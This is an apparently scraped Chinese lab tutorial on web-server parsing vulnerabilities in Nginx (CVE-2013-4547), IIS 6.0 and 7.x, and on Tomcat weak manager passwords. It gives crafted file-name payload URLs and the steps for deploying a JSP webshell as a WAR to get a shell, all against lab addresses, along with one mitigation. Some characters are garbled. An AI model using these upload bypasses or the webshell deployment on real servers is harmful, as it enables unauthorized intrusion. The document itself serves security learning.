文章插图
Nginx - ?件路径解析漏洞 - CVE-2013-4547
影响版本
Nginx 0.8.41 ~ 1.4.3Nginx 1.5.0 ~ 1.5.7【常见组件漏洞】漏洞环境登陆docker 环境
漏洞触发
# 上传图???[1_yjh.jpg ] // .jpg后面有一个空格http://192.168.16.100:8080/uploadfiles/1_yjh.pnghttp://192.168.16.100:8080/uploadfiles/1_yjh.png[0x20][0x00].php 
文章插图
文章插图
文章插图
文章插图
文章插图
其他:
文章插图
IIS
IIS 6.0 解析漏洞
漏洞环境
Windows 2003
// time.asp<%=time()%> 
文章插图
分号?件名截断
time.asptime.asp;.jpghttp://10.10.10.233:8000/time.asp;.jpg 
文章插图
*.asp ?录解析错误
time.jpg/1.asp/time.jpg//time.asp--->time.jpghttp://10.10.10.233:8000/1.asp/time.jpg 
文章插图
time.jpg放在1.asp下被当做.asp来解析!
IIS 7.0/7.5 解析漏洞
漏洞环境
Windows 2008IIS+PHP漏洞的触发http://192.168.16.193:8000/index.pnghttp://192.168.16.193:8000/index.png/.php 
文章插图
漏洞防护
PHP-CGI1. cgi.fix_pathinfo = 02. 处理映射程序|编辑模块映射|请求限制|映射|对勾 
文章插图
文章插图
文章插图
Tomcat
Tomcat 的安装与配置
直接解压
配置环境变量
C:Program FilesJavajdk1.8.0_131JAVA_HOME:C:Program FilesJavajdk1.8.0_131Path:%JAVA_HOME%bin;%JAVA_HOME%jrebin;启动Tomcat:C:apache-tomcat-8.5.32bin>startup.bat 
文章插图
nmap 扫描端?
sudo nmap -A -p- 192.168.10.130 
文章插图
开启Tomcat 管理控制台manager 远程访问
/webApps/manager/META-INF/context.xml 
文章插图
配置管理控制台账密
/conf/tomcat-users.xml 
文章插图
弱?令到GetShell
使? tomcat/tomcat,登录 Manager App。
核?思路:通过管理控制台部署Web 应?,Web 应?就是后?!
将jsp ?件打包
jar cvf jshell.war jshell.jsphttp://192.168.16.193:8080/jshell/jshell.jsp大马:jshell.jsp
文章插图
部署:
文章插图
大马密码:
文章插图
文章插图
文章插图
AJP LFI - CVE-2020-1938
2020年1?6?,国家信息安全漏洞共享平台(CNVD)收录了Apache Tomcat?件包含漏洞(CNVD-2020-10487,对应CVE-2020-1938) 。攻击者利?该漏洞,可在未授权的情况下远程读取特定?录下的任意?件 。
推荐阅读
- 避免开源代码漏洞的4个最佳实践
- 基于SCL语言的结构化编程案例,常见问题解答
- WPS如何启用宏功能,VBA组件安装
- 吃三七的禁忌有哪些
- ?香菇青菜鸡肉粥
- Web漏洞扫描——AWVS漏扫工具的使用
- phpStudy nginx 解析漏洞通告
- 离合器常见的故障有哪四种?
- 痘痘|十问十答,夏季脸上长痘常见问题解答,避坑指南
- Ruckus 路由器多个漏洞分析